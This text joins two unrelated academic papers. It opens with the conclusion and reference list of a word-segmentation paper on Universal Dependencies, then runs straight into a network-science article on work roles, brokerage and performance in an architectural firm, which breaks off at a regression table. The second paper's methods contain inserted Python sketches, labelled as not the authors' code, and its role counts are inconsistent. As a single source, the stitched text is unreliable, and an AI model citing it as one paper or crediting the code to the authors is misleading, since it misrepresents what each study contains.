8CoNLL-UL is not evaluated in our experiments as it is very recent work. 433 languages, very high accuracy can be obtained even with relatively small training sets, while more train- ing data is required for high segmentation accuracy for languages without spaces. Based on the analy- sis, we apply a minimal number of language-specific settings to substantially improve the segmentation accuracy for languages that are fundamentally more difficult to process. The segmenter is extensively evaluated on the UD datasets in various languages and compared with UDPipe. Apart from obtaining nearly perfect segmentation on most of the space-delimited lan- guages, our system achieves high accuracies on lan- guages without space delimiters such as Chinese and Japanese as well as Semitic languages with abundant multiword tokens like Arabic and Hebrew. Acknowledgments We acknowledge the computational resources pro- vided by CSC in Helsinki and Sigma2 in Oslo through NeIC-NLPL (www.nlpl.eu). This work is supported by the Chinese Scholarship Council (CSC) (No. 201407930015). We would like to thank the TACL editors and reviewers for their valuable feedback. References Martı́n Abadi, Paul Barham, Jianmin Chen, Zhifeng Chen, Andy Davis, Jeffrey Dean, Matthieu Devin, Sanjay Ghemawat, Geoffrey Irving, Michael Isard, et al. 2016. TensorFlow: A system for large-scale machine learning. In Proceedings of the 12th USENIX Symposium on Operating Systems Design and Imple- mentation (OSDI), pages 265–283. Hervé Abdi and Lynne J Williams. 2010. Principal component analysis. Wiley Interdisciplinary Reviews: Computational Statistics, 2(4):433–459. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. 
Neural machine translation by jointly learning to align and translate. In International Con- ference on Learning Representations. Anders Björkelund, Agnieszka Falenska, Xiang Yu, and Jonas Kuhn. 2017. IMS at the CoNLL 2017 UD shared task: CRFs and perceptrons meet neural net- works. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies, pages 40–51. Wanxiang Che, Jiang Guo, Yuxuan Wang, Bo Zheng, Huaipeng Zhao, Yang Liu, Dechuan Teng, and Ting Liu. 2017. The HIT-SCIR system for end-to-end pars- ing of universal dependencies. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies, pages 52–62. Xinchi Chen, Xipeng Qiu, Chenxi Zhu, Pengfei Liu, and Xuanjing Huang. 2015. Long short-term mem- ory neural networks for Chinese word segmentation. In Conference on Empirical Methods in Natural Lan- guage Processing, pages 1197–1206. Kyunghyun Cho, Bart Van Merriënboer, Dzmitry Bah- danau, and Yoshua Bengio. 2014. On the properties of neural machine translation: Encoder-decoder ap- proaches. arXiv preprint arXiv:1409.1259. Miryam de Lhoneux, Yan Shao, Ali Basirat, Eliyahu Kiperwasser, Sara Stymne, Yoav Goldberg, and Joakim Nivre. 2017. From raw text to Universal De- pendencies – look, no tags! In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies., pages 207–217. Timothy Dozat, Peng Qi, and Christopher D. Man- ning. 2017. Stanford’s graph-based neural depen- dency parser at the CoNLL 2017 shared task. In Pro- ceedings of the CoNLL 2017 Shared Task: Multilin- gual Parsing from Raw Text to Universal Dependen- cies, pages 20–30, Vancouver, Canada, August. Asso- ciation for Computational Linguistics. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. Journal of Machine Learning Research, 12(Jul):2121–2159. Xavier Glorot and Yoshua Bengio. 2010. Understanding the difficulty of training deep feedforward neural net- works. In International Conference on Artificial Intel- ligence and Statistics, pages 249–256. Yoav Goldberg and Michael Elhadad. 2013. Word seg- mentation, unknown-word resolution, and morpholog- ical agreement in a Hebrew parsing system. Computa- tional Linguistics, 39(1):121–160, March. Noemie Guthmann, Yuval Krymolowski, Adi Milea, and Yoad Winter. 2009. Automatic annotation of mor- phosyntactic dependencies in a modern Hebrew. In Proceedings of the 1st Workshop on Treebanks and Linguistic Theories, pages 1–12. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural computation, 9(8):1735– 1780. Zhiheng Huang, Wei Xu, and Kai Yu. 2015. Bidi- rectional LSTM-CRF models for sequence tagging. arXiv preprint arXiv:1508.01991. Peter J Huber. 1964. Robust estimation of a location pa- rameter. The annals of mathematical statistics, pages 73–101. 434 Alon Itai and Shuly Wintner. 2008. Language resources for Hebrew. Language Resources and Evaluation, 42(1):75–98. John D. Lafferty, Andrew McCallum, and Fernando C. N. Pereira. 2001. Conditional random fields: Probabilis- tic models for segmenting and labeling sequence data. In Proceedings of the Eighteenth International Con- ference on Machine Learning, ICML ’01, pages 282– 289. Haizhou Li, A Kumaran, Vladimir Pervouchine, and Min Zhang. 2009. Report of NEWS 2009 machine translit- eration shared task. In Proceedings of the 2009 Named Entities Workshop: Shared Task on Transliteration, pages 1–18. 
Edward Loper and Steven Bird. 2002. NLTK: The nat- ural language toolkit. In Proceedings of the ACL-02 Workshop on Effective tools and methodologies for teaching natural language processing and computa- tional linguistics-Volume 1, pages 63–70. Association for Computational Linguistics. Will Monroe, Spence Green, and Christopher D Man- ning. 2014. Word segmentation of informal arabic with domain adaptation. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), volume 2, pages 206–211. Amir More, Özlem Çetinoğlu, Çağrı Çöltekin, Nizar Habash, Benoı̂t Sagot, Djamé Seddah, Dima Taji, and Reut Tsarfaty. 2018. CoNLL-UL: Universal morpho- logical lattices for Universal Dependency parsing. In Proceedings of the Eleventh International Conference on Language Resources and Evaluation. Joakim Nivre, Marie-Catherine de Marneffe, Filip Ginter, Yoav Goldberg, Jan Hajic, Christopher D. Manning, Ryan McDonald, Slav Petrov, Sampo Pyysalo, Na- talia Silveira, Reut Tsarfaty, and Daniel Zeman. 2016. Universal dependencies v1: A multilingual treebank collection. In Proceedings of the 10th International Conference on Language Resources and Evaluation, pages 1659–1666. David Palmer and John Burger. 1997. Chinese word seg- mentation and information retrieval. In AAAI Spring Symposium on Cross-Language Text and Speech Re- trieval, pages 175–178. Teemu Ruokolainen, Oskar Kohonen, Sami Virpioja, and Mikko Kurimo. 2013. Supervised morphological seg- mentation in a low-resource learning setting using con- ditional random fields. In Proceedings of the Sev- enteenth Conference on Computational Natural Lan- guage Learning, pages 29–37, Sofia, Bulgaria. Asso- ciation for Computational Linguistics. Ivan A Sag, Timothy Baldwin, Francis Bond, Ann Copes- take, and Dan Flickinger. 2002. Multiword expres- sions: A pain in the neck for NLP. In International Conference on Intelligent Text Processing and Com- putational Linguistics, pages 1–15. Springer. Yan Shao, Christian Hardmeier, Jörg Tiedemann, and Joakim Nivre. 2017. Character-based joint segmenta- tion and POS tagging for Chinese using bidirectional RNN-CRF. In Proceedings the 8th International Joint Conference on Natural Language Processing, pages 173–183. Nitish Srivastava, Geoffrey E Hinton, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2014. Dropout: a simple way to prevent neural networks from overfitting. Journal of Machine Learning Re- search, 15(1):1929–1958. Milan Straka and Jana Straková. 2017. Tokenizing, POS tagging, lemmatizing and parsing UD 2.0 with UD- Pipe. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal De- pendencies, pages 88–99. Nianwen Xue. 2003. Chinese word segmentation as character tagging. Computational Linguistics and Chinese Language Processing, pages 29–48. Daniel Zeman, Martin Popel, Milan Straka, Jan Ha- jic, Joakim Nivre, Filip Ginter, Juhani Luotolahti, Sampo Pyysalo, Slav Petrov, Martin Potthast, Fran- cis Tyers, Elena Badmaeva, Memduh Gokirmak, Anna Nedoluzhko, Silvie Cinkova, Jan Hajic jr., Jaroslava Hlavacova, Václava Kettnerová, Zdenka Uresova, Jenna Kanerva, Stina Ojala, Anna Missilä, Christopher D. 
Manning, Sebastian Schuster, Siva Reddy, Dima Taji, Nizar Habash, Herman Leung, Marie-Catherine de Marneffe, Manuela Sanguinetti, Maria Simi, Hiroshi Kanayama, Valeria dePaiva, Kira Droganova, Héctor Martínez Alonso, Çağrı Çöltekin, Umut Sulubacak, Hans Uszkoreit, Vivien Macketanz, Aljoscha Burchardt, Kim Harris, Katrin Marheinecke, Georg Rehm, Tolga Kayadelen, Mohammed Attia, Ali Elkahky, Zhuoran Yu, Emily Pitler, Saran Lertpradit, Michael Mandl, Jesse Kirchner, Hector Fernandez Alcalde, Jana Strnadová, Esha Banerjee, Ruli Manurung, Antonio Stella, Atsuko Shimada, Sookyoung Kwak, Gustavo Mendonca, Tatiana Lando, Rattima Nitisaroj, and Josie Li. 2017. CoNLL 2017 shared task: Multilingual parsing from raw text to Universal Dependencies. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies, pages 1–19. Hai Zhao, Chang-Ning Huang, Mu Li, and Bao-Liang Lu. 2006. Effective tag set selection in Chinese word segmentation via conditional random field modeling. In Proceedings of the 20th Pacific Asia Conference on Language, Information and Computation, pages 87–94. Youguang Zhou. 1991. The family of Chinese character-type scripts. Sino-Platonic Papers, 28.

© 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/).
CONNECTIONS Issue 1 | Vol. 40 | Article | DOI: 10.21307/connections-2019.012
The contingent effect of work roles on brokerage in professional organizations
Anssi Smedlund1,* and Emily W. Choi2
1 Finnish Institute of Occupational Health, Helsinki, Uusimaa.
2 Naveen Jindal School of Management, The University of Texas at Dallas, Texas, TX.
*E-mail: anssi.smedlund@ttl.fi

Abstract
In this paper, we consider whether brokerage in an intra-organizational communication network and type of work role interact to predict individual performance in a professional organization. The independent–interdependent nature of work roles is considered a key factor in structural contingency theory, but is yet to be studied in relation to brokerage. We propose that a brokerage position has a joint effect on performance along with work role in a study of the organization-wide communication network in an architectural firm with 65 employees. Our analysis suggests an association between brokerage and role-prescribed performance for individuals in both interdependent and independent types of work roles. Our findings also suggest that for interdependent roles requiring broad, organization-wide collaboration and communication with others, brokerage is positively associated with the performance prescribed by the role, but for independent roles, wherein collaboration and communication are somewhat limited by the formal role, brokerage has far less of an effect. Our findings contribute to brokerage theory by comparing how brokerage affects performance in two distinct work roles, illustrating how the benefits of brokerage seem more restricted to those in interdependent work roles. The contribution of this paper is to suggest the independent–interdependent nature of work role as a boundary condition for brokerage.

Keywords: Network theory, Brokerage, Formal organization, Informal organization, Work role, Interdependency

Brokerage theory is probably one of the most influential lines of thought in network theory.
Since Burt's (1992) seminal book, brokerage has been studied and associated with numerous organizational advantages for an individual, such as higher salary and faster promotion, based on the benefits of having better access to information and greater control over other actors than their more socially constrained colleagues (Burt, 2004). While brokerage generally provides benefits, some studies have found that under context-specific conditions, there may not always be positive effects (e.g. Barnes et al., 2016; Burt, 1998; Fleming et al., 2007). Therefore, as the empirical results are mixed, the contingencies and boundary conditions for brokerage merit further research. An important, but generally overlooked boundary condition in structural network analysis is the independent–interdependent nature of work roles, even though interdependency has been widely used as a moderator in general management studies and is at the core of structural contingency theory (Thompson, 1967). Interdependence regulates how much individuals can communicate and collaborate with others to perform their work effectively (Cummings, 1978; Wang et al., 2019), and is one of the most important factors influencing team performance in organizations (Langfred, 2005; Saavedra et al., 1993). This empirical study considered how the benefits of brokerage are contingent on the independent–interdependent nature of the work role, that is, how the informal organization, operationalized as the intra-organizational communication network structure, corresponds with the formal work role for performance. The novelty and value of this approach is that, although the formal and informal organizations have each been linked to performance outcomes, their effects on each other have seldom been linked in the literature (McEvily et al., 2014). Following the logic of structural contingency theory to test the formal work role's effect as a boundary condition for brokerage, our paper explores whether work role moderates the effect of brokerage on performance in professional organizations. Drawing from the nature of work at our case architectural firm, our hypothesis starts from the premise that work in a professional organization is generally anchored in either independent or interdependent tasks, and work roles are formed accordingly. Both independent and interdependent roles prompt role-prescribed performance expectations due to the division of labor: professionals typically work on intellectually demanding projects, requiring them to focus their energy on the highly demanding operative work, simultaneously creating demand for interdependent roles to manage the projects and the supporting organizations (cf. Etzioni, 1964; Weber, 1982). Thus, the formal work role not only limits interdependence for the professionals, but also requires managers to adopt the interdependent role and to communicate and collaborate broadly across the organization. In this paper, we hypothesize that when brokerage and role-prescribed performance are aligned, individuals perform best.
Our data are derived from a communication network study of an architectural firm of 93 employees, of which 65 were classified as working mainly in either independent (n = 31) or interdependent (n = 34) roles. We chose to study this specific architectural firm as a typical professional organization because the firm had clearly distinguished work roles for the independent professional architects and the interdependent managers (the organization's work role structures and innovation activities were studied extensively in a two-year research project with 13 theme-based interviews and several workshops; the results are reported in a PhD thesis, Tuominen, 2013). In our analysis, we examined the moderating effect of work role on the association between brokerage and role-specific individual performance. Role-specific performance involved an objective measure of either billable hours for the professional architects (i.e. independent work role) or a peer evaluation score of managers as promoters of ideas (i.e. interdependent work role). Our study speaks to the underlying assumptions about the effects of brokerage. Despite a few negative reports in the literature (e.g. Barnes et al., 2016; Fleming et al., 2007), the general understanding about brokerage is that it benefits the individual in most circumstances. In this regard, our study contributes to brokerage theory by pointing out an important contingency of work role. In practical terms, our findings imply that independent professionals, such as architects, do not seem to benefit much from networking and bridge building, since these are less related to their role-prescribed performance. In the context of management theory, our study contributes to a better understanding of the interplay of formal and informal organizations. These two topics have historically remained separate and unconnected (McEvily et al., 2014) but have spurred a number of integrative studies (Biancani et al., 2014; Kleinbaum et al., 2013; Soda and Zaheer, 2012; Srivastava, 2015). By treating work role as a moderator in molding the association between brokerage and performance, we address the gap in the literature on the topic by extending structural network analysis with contingencies (Adler and Kwon, 2002; Carnabuci and Oszegi, 2015; Cross and Cummings, 2004; Hansen, 1999; Mehra et al., 2001). By doing this, we increase the explanatory power of structural analysis (Lincoln, 1990; cf. Lincoln and Miller, 1979), resulting in increased knowledge of how informal network position is associated with role-prescribed performance.

Contingent effect of work role on the relationship between brokerage and performance
The basic tenet of our study is that there are, on the whole, fundamental differences in the communication and cooperation requirements between independent and interdependent work roles. According to classical management theory, work roles outline a kind of bureaucratic boundary for social relationships that individuals can and should adhere to and engage in within their organization – when an individual is assigned a certain role, then the communication network becomes somewhat inherited and defined by the role (Hansen and Haas, 2001; Lincoln and Miller, 1979; McEvily et al., 2014; Merton, 1939; Weber, 1982).
Over time, individuals develop informal networks largely corresponding the role-prescribed relationships (Lincoln and Miller, 1979; Padgett and Ansell, 1993), but the networks reach beyond the formal bureaucratic boundaries as individuals communicate freely across the organization (Krackhardt, 1994). In addition to communication, formal division of labor and corresponding roles also affect expected performance. Previous research has noted that a work role defines what types of activities an individual performs, prompts normative expectations in an organization, and sets the standard for how performance is evaluated (Biddle, 1986; Katz and Kahn, 1978; Welbourne et al., 1998). In the most extreme cases, performance that is not prescribed by the work role is prohibited and only the type of performance established for the role is rewarded (Pfeffer and Salancik, 1975). Conceivably because performance expectations are strongly determined by the work role, a notable body of research studies specifically considers work role performance, and the conditions to manage and maximize it (Griffin et al., 2007; Leroy et al., 2015). Work roles having a contingent effect on the relationship between brokerage and performance can be analyzed using structural contingency theory combined with the conception of organization as a socio-technical system. As a socio-technical system, professional organization is a combination of social, interpersonal communication networks, and technical roles specified by the formal division of labor, wherein the formal aspects interact with the social aspects of performance (Cummings, 1978). From this perspective, work role is derived from technology and corresponds with Thompson’s (1967) pooled task interdependence for independent work and reciprocal task interdependence for interdependent work. In the former category, rules and standard procedures provide enough coordination for the individuals and teams to work independently toward a common goal, and in the latter category, the coordination mechanism involves a mutual adjustment, as the work is performed together to produce the output. Specifically, the independent– interdependent nature of work has been a key focus of research related to team performance (Cummings, 1978; Langfred, 2005; Wang et al., 2019). In these studies, interdependence is built-in to the work the team performs, and then treated as a moderator of aspects such as group autonomy, collective efficacy, group potency, organizational citizenship or diversity for several different types of outcomes (Bachrach et al., 2006; Langfred, 2000, 2005; Stajkovic et al., 2009; Wang et al., 2019). Notable in the results of these studies is the support for the mechanisms derived from Thompson’s (1967) theory that demonstrate that the need for communication and cooperation increases along with an increase in the task interdependency, complexity of goals and feedback (Saavedra et al., 1993). In professional organizations, these dimensions become increasingly complex amid higher positions in formal hierarchy simply because managers tend to have increasingly broader job descriptions than their subordinates and participate in a larger number of overlapping projects of various kinds. Typically, managers are experienced professionals in their field, and they perform some of the client project work in addition to fulfilling the expectations toward sales, organizational development and coordinating activities in their departments or other work units (e.g. Etzioni, 1964). 
A manager's goals are in this respect defined from both above and below their hierarchical position, and they receive feedback for their work from several others aside from their immediate colleagues. In contrast, professionals are technical specialists, and performing their job well generally requires spending more time at their desks working on specific projects, thus having inherently higher independence incorporated in their work roles, even if their projects may require combining several individuals' work. Table 1 summarizes how professionals and managers differ in terms of interdependency based on the dimensions identified by Saavedra et al. (1993). A brokerage position in a communication network of interdependent work roles can provide a major boost to effective communication and cooperation. Studies show that brokerage provides the best position to coordinate work across other areas of a work communication network (Burt, 1992; Granovetter, 1973) and increases the ability to convey ideas across the organization to the distant individuals in the network (Reagans and McEvily, 2003). Brokerage also increases the chances that an individual's activities are considered and engaged with by others and, concomitantly, judged valuable (Burt, 2004). In general, brokerage means less structural constraint, more diversity, and weaker ties (Aral and Van Alstyne, 2011), and allows individuals to benefit from non-redundant sources of knowledge (Hansen, 1999). The more interdependent the work role is, the greater the need for brokerage in a professional organization. Our hypothesis evaluates how brokerage in the communication network and independent–interdependent work roles interact with each other:

H1. Work role moderates the relationship between brokerage and role-prescribed performance such that the contribution of brokerage is stronger when the work role is interdependent compared to independent.

Methods
Data
We tested our hypotheses using data collected in an architectural firm during a two-year study. We collected questionnaire and timesheet data from employees who participated in client projects, resided in the same open office, and were employed during the first and second years of the study (n = 65). To control for common method variance and develop a causal argument on the network positions and performance, the data on dependent variables were collected in the second year of the study from time sheets and from an additional online survey. In total, there were 93 employees at the start of the study; the remaining 28 employees worked at other physical locations, left the company or belonged to administrative staff (e.g. information system administration and payroll). There were five formal roles: professionals, project managers, senior project managers, and managing partners. The professional architects were coded as independent roles (n = 31) and all manager roles were coded as interdependent roles (n = 34). The professionals performed different aspects of design and drawings, and managers attended to sales, project management, and development. Based on 13 interviews about work roles and innovative activities at the case company reported by Tuominen (2013), the professionals were clearly a distinct group from the managers and were allowed to focus mainly on their solitary architectural design work.
Conversely, managers were given broad responsibilities in managing work units and engaged in development and innovation. The case firm invested heavily in innovation and development and, just before the beginning of our data collection, promoted several individuals previously working as professional architects to project managers. Both work roles required talent and extensive training in architectural design, but they differed in communication patterns: the managers had to communicate across the firm to participate in and supervise several development projects. A total of 33% of the sample were women, and 83% had a master's degree in architecture, which is the minimal required training for certified architects. The remaining 17% had a bachelor's degree or vocational degree in a related design field. The average tenure was 9.25 years (SD = 6.83) for managers and 5.17 years (SD = 4.89) for professionals.

Table 1. Differences between independent and interdependent work roles in a professional organization.
Typical formal role. Independent: Professional. Interdependent: Manager.
Task interdependency. Independent: Client projects of several sequential and parallel tasks to be worked on alone and coordinated within the project team. Interdependent: Supervision over work units, selling, negotiating, and participating in several client projects; member of business development and strategy development teams.
Goal interdependency. Independent: Client project provides clear goals for each individual and for the compiled output of the project. Interdependent: Several goals coming from projects, firm, and clients.
Feedback interdependency. Independent: Individuals receive feedback from colleagues working on the same project; collective feedback provided by superior and client during and after the project. Interdependent: Feedback from subordinates, from clients and from top management; feedback from several projects.
Requirements for collaboration and coordination. Independent: Lower. Interdependent: Higher.

Measures
Dependent variables
We used billable hours from clients as a dependent variable of role-prescribed performance for the independent work roles. This was constructed based on time sheets, where the employees had allocated their working time to a variety of categories. We chose billable hours from the client category as a performance measure of independent work roles because the firm aimed at maximizing it and it was directly linked to annual profit. We calculated a monthly mean of the number of billable hours to generate a uniform variable describing individuals' average performance through the year. Monthly mean billable hours were 94.76 (SD = 38.04) for interdependent roles and 114.16 (SD = 22.27) for independent roles. The variable was normalized with a second power transformation to adjust its skew. For the variable describing role-prescribed performance for interdependent work roles, we chose promoting of new ideas. Following the survey examples from Wasserman and Faust (1994), the variable was constructed from a questionnaire in which the respondent was asked to name five individuals in the firm who promote new ideas. Each nomination received one point, and points were summed, resulting in a count variable of interdependent work roles' performance. This procedure was chosen because it provides a single component measure of a person's perceived competence and ability to put forth actions in the organization that will eventually lead to innovation (March, 1991). This measure also corresponds with the current understanding of creativity that highlights the generation of both novel and useful ideas (Amabile, 1996) and provides a measure to identify those individuals who are both coming up with ideas and promoting them. The variable was normalized with a square root transformation to adjust its skew.
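As an illustration of the two dependent variables described above, the following sketch shows how they could be assembled with pandas from a timesheet table and a nomination table. The column names (employee_id, month, category, hours, nominee_id) are hypothetical and not taken from the paper; only the transformations mirror the second-power and square-root adjustments mentioned in the text.

```python
# Illustrative sketch only (not the authors' code): assembling the two role-prescribed
# performance variables from hypothetical timesheet and nomination tables.
import numpy as np
import pandas as pd

def billable_hours_dv(timesheet: pd.DataFrame) -> pd.Series:
    """Monthly mean of client-billable hours per employee, squared to adjust skew."""
    client = timesheet[timesheet["category"] == "client"]
    monthly = client.groupby(["employee_id", "month"])["hours"].sum()
    mean_monthly = monthly.groupby(level="employee_id").mean()
    return mean_monthly ** 2  # second power transformation, as in the text above

def idea_promotion_dv(nominations: pd.DataFrame, employee_ids) -> pd.Series:
    """Count of 'promotes new ideas' nominations per employee, square-root transformed."""
    counts = nominations["nominee_id"].value_counts()
    counts = counts.reindex(employee_ids, fill_value=0)  # keep zero-nomination employees
    return np.sqrt(counts)
```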
Independent variables
The network data consisted of information on self-reported social ties in three types of work-related communication, collected through an online sociometric survey instrument in the first year of the study. Preliminary interviews consistently identified three types of informal, work-related interaction among employees that we distinguished in our survey: communication about (i) the day-to-day architectural design work, (ii) innovative new ideas, and (iii) business development. The network data were obtained from a free-choice survey with two-way directed questions, wherein the giving-information-to and getting-information-from components of communication were asked separately (Wasserman and Faust, 1994). Thus, three network survey question pairs were used: one for communication about the day-to-day architectural design work, one for innovative new ideas, and one for business development. The wording of the questions was tailored to reflect the conditions of the company based on the interviews and was checked with one of the supervisors before publishing the survey online. A one-sentence example was given for all three types of communication. Communication about the day-to-day architectural design work was defined as relating to the recurring output delivered to clients within the realm of the respondent's line of expertise. Communication about innovative new ideas was defined as work-related ideas that the respondent was not aware of anyone else proposing previously. Business development communication was defined as communication about improvements in pre-existing products or services, or in internal company processes or personal work practices. The response rate was 90% for the questions about communication in day-to-day architectural design work and business development tasks and 84% for communicating innovative new ideas. In the online survey, the network questions were presented after a filtering question wherein the employees had defined their own acquaintances from a roster of all employee names. The small organization size permitted a full roster method, which rules out recall bias, thus increasing the reliability of the network measures (Marsden, 2011). Separating the giving and getting components of communication further increases psychometric reliability by allowing confirmation of each social tie (Krackhardt, 1990). The frequency scale for communication was set to the choices of (4) daily, (3) weekly, (2) once a month, (1) less than once a month, or (0) not at all. We transposed the getting-information-from component in each of the network question pairs and joined the resulting two networks, using the value of the giving-information component as the communication frequency, resulting in confirmed communication ties between individuals. Before generating the brokerage measures, we combined the three networks by summing up the frequencies and then dichotomizing at the mean frequency (MIN = 1, MAX = 12, MEAN = 3.411, SD = 2.47).
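The paper computed its network measures with Ucinet VI and a Stata package (described in the next subsection). The sketch below is a rough NetworkX analogue, under the assumption that the giving and getting reports are available as square adjacency matrices of reported frequencies; it is meant only to illustrate the tie-confirmation, aggregation, dichotomization and brokerage steps, not to reproduce the original computations.

```python
# Rough NetworkX analogue of the steps described above and of the brokerage measures
# introduced in the next subsection. Assumption: the paper used Ucinet VI and Stata,
# not this code; 'giving' and 'getting' are adjacency matrices of reported frequencies.
import networkx as nx
import numpy as np

def confirmed_network(giving, getting):
    """Keep tie i -> j only if i reports giving to j and j reports getting from i;
    the giving frequency is used as the tie value."""
    return np.where((giving > 0) & (getting.T > 0), giving, 0)

def combined_dichotomized(networks):
    """Sum the three confirmed networks, dichotomize at the mean of the non-zero
    frequencies, and return an undirected graph."""
    total = sum(networks)
    threshold = total[total > 0].mean()
    adjacency = (total >= threshold).astype(int)
    return nx.from_numpy_array(np.maximum(adjacency, adjacency.T))

def brokerage_measures(graph):
    """1 - Burt's constraint (higher = more brokerage opportunities) and betweenness."""
    constraint = nx.constraint(graph)
    return {
        "inv_constraint": {n: 1.0 - c for n, c in constraint.items()},
        "betweenness": nx.betweenness_centrality(graph, normalized=False),
    }
```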
Brokerage
Our first brokerage measure was the additive inverse of Burt's constraint (Burt, 1992). First, we generated Burt's constraint with the Ucinet VI structural holes routine, limiting the measure to consider only an individual's contacts' ties and using both outgoing and incoming ties. Then we generated our brokerage measure by calculating 1 minus constraint, following recent network studies (Carnabuci and Oszegi, 2015; Soda et al., 2019). Thus, the higher the resulting brokerage measure, the more brokering opportunities the individual has. In other words, our measure indicates how an individual's communication is concentrated in non-redundant contacts in groups of connected colleagues, because less constrained actors are connected to more groups of others (Burt, 1992). In our analysis, the higher the additive inverse of Burt's constraint, the better the opportunities for brokerage the individual has. As the second brokerage measure, we used betweenness centrality (Freeman, 1977), generated with the Stata "nwcommands" package. We added betweenness centrality to the measures because it has been frequently used as an additional brokerage measure (e.g. Fang et al., 2015).

Independent work role
We created a dummy variable to distinguish between independent and interdependent roles. All individuals in any of the manager roles (n = 34) were coded as interdependent (0) and all individuals in professional architect roles (n = 31) were coded as independent (1).

Control variables
We asked the human resource manager of the company to provide us with demographic data on the employees. From those data, we created control variables for organizational tenure, gender, and education to be used in our models because they were found to be significant in earlier studies of network positions and various outcome variables (Reagans and McEvily, 2003; Reagans and Zuckerman, 2001). Language skills and age were also considered in evaluating the modeling strategy, but these variables did not increase the explanatory power of the models and were dropped. Individuals were very homogeneous in terms of language skills, and age was highly correlated with tenure. There were six divisions in the firm specializing in certain types of architectural projects, for example, office buildings or shopping malls. We checked the intraclass correlation (ICC) between the units to determine whether unit affiliation is a considerable source of variance in performance and did not find justification for hierarchical models.

Results
Table 2 presents bivariate correlations and descriptive statistics of the variables. Dependent variables and work role are numbered 1 to 3, followed by control variables and brokerage measures.

Table 2. Means, standard deviations, and correlations.
1 Billable hours: mean 103.88, SD 32.89.
2 Promoting new ideas: mean 4.18, SD 6.15; correlation with (1) −0.56**.
3 Independent work role: mean 0.47, SD 0.50; correlations with (1) 0.30*, (2) −0.41**.
4 Tenure: mean 7.37, SD 6.31; correlations with (1) −0.07, (2) 0.16, (3) −0.32**.
5 Female: mean 0.33, SD 0.48; correlations with (1) 0.13, (2) −0.18, (3) 0.11, (4) −0.13.
6 Master's degree: mean 0.83, SD 0.38; correlations with (1) −0.06, (2) 0.20, (3) −0.39**, (4) 0.08, (5) −0.20.
7 Inverse of Burt's constraint: mean 0.06, SD 0.06; correlations with (1) −0.19, (2) 0.41**, (3) −0.35**, (4) 0.25*, (5) −0.41**, (6) 0.06.
8 Betweenness centrality: mean 77.29, SD 89.72; correlations with (1) −0.32**, (2) 0.77**, (3) −0.27*, (4) 0.12, (5) −0.25*, (6) 0.11, (7) 0.60**.
Notes: *p < 0.05; **p < 0.01.
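A descriptive table of this kind can be produced directly from the analysis data set. The sketch below is illustrative only; the variable names are hypothetical and the paper does not state which software produced Table 2.

```python
# Illustrative sketch (hypothetical variable names): computing the descriptive statistics
# and bivariate Pearson correlations of the kind reported in Table 2 with pandas.
import pandas as pd

VARS = ["billable_hours", "promoting_new_ideas", "independent_role",
        "tenure", "female", "masters_degree", "inv_constraint", "betweenness"]

def descriptives_and_correlations(df: pd.DataFrame):
    summary = df[VARS].agg(["mean", "std"]).T        # means and standard deviations
    correlations = df[VARS].corr(method="pearson")   # bivariate correlation matrix
    return summary, correlations
```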
We found a positive correlation between both brokerage measures and idea promotion. The correlation of billable hours with betweenness centrality is significantly negative, while its correlation with the inverse of Burt's constraint is not significant. The independent role (1 = independent, 0 = interdependent) correlates positively with the number of billable hours and negatively with idea promotion, which supports the assumption of distinct output expectations between the work roles. Having a master's degree and tenure correlate negatively with the independent work role, indicating that those in interdependent work roles have higher education and higher tenure than those in independent roles. Both brokerage measures are positively intercorrelated, as expected. We z-standardized all independent variables to facilitate better interpretation of the moderation effect, as suggested by Dawson (2014). Tables 3 and 4 present the results of the regression analyses testing the association between the inverse of Burt's constraint, betweenness centrality, promoting new ideas, and billable hours. As postestimation of the models showed heteroscedasticity of the residuals caused by slight non-normality of the transformed dependent variables, we used robust standard errors to control for this, as suggested by Antonakis and Dietz (2011). OLS regression was chosen because it has been considered a valid modeling strategy when network measures are included as independent variables (e.g. Reagans and McEvily, 2003; Srivastava, 2015). However, the network measures violate the independence of observations, which is one of the key assumptions of OLS regression, resulting in underestimated standard errors and over-rejection of hypotheses (Srivastava, 2015). To correct this, we chose a procedure suggested by Borgatti et al. (2018) and compared the results of our conventional OLS models with those obtained from Ucinet VI node-level regression, which uses OLS regression to generate the coefficients but a permutation technique for the p-values. As both modeling techniques are presented side by side in Tables 3 and 4, it can be observed that the permutation technique generally results in higher t-values for those coefficients that are statistically significant, providing additional support for our results. Our hypothesis about the work role's boundary effect on brokerage means that brokerage is associated with higher work role-prescribed performance if the role is interdependent. In other words, as employees in interdependent work roles are expected to engage in promoting new ideas in the organization, they benefit from brokerage. To test this aspect of the hypothesis, we first examined the main effects of the inverse of Burt's constraint and betweenness centrality and then their interactions with independent versus interdependent work role.

Table 3. Results of conventional and node-level OLS regression analysis for promoting new ideas (t-values in parentheses). Columns: Model 1 (conventional OLS), Model 2 (permutation OLS), Model 3 (conventional OLS), Model 4 (permutation OLS).
Independent work role: −0.54 (−1.62); −0.54 (−1.79); −0.82 (−3.08)**; −0.82 (−3.25)**.
Tenure: 0.06 (0.45); 0.06 (0.50); 0.10 (0.79); 0.10 (0.91).
Female: 0.34 (1.57); 0.34 (1.17); 0.22 (1.20); 0.22 (0.92).
Master's degree: 0.15 (0.60); 0.15 (0.41); 0.11 (0.52); 0.11 (0.35).
Inverse of Burt's constraint (Models 1 and 2): 2.10 (3.47)**; 2.10 (4.97)**.
Independent × Inv. of Burt's constraint (Models 1 and 2): −1.78 (−2.81)**; −1.78 (−3.76)**.
Betweenness centrality (Models 3 and 4): 0.86 (5.92)**; 0.86 (7.22)**.
Independent × Betweenness (Models 3 and 4): −0.33 (−1.25); −0.33 (−1.12).
Constant: 1.20 (3.09)**; 1.20 (na); 1.65 (5.80)**; 1.65 (na).
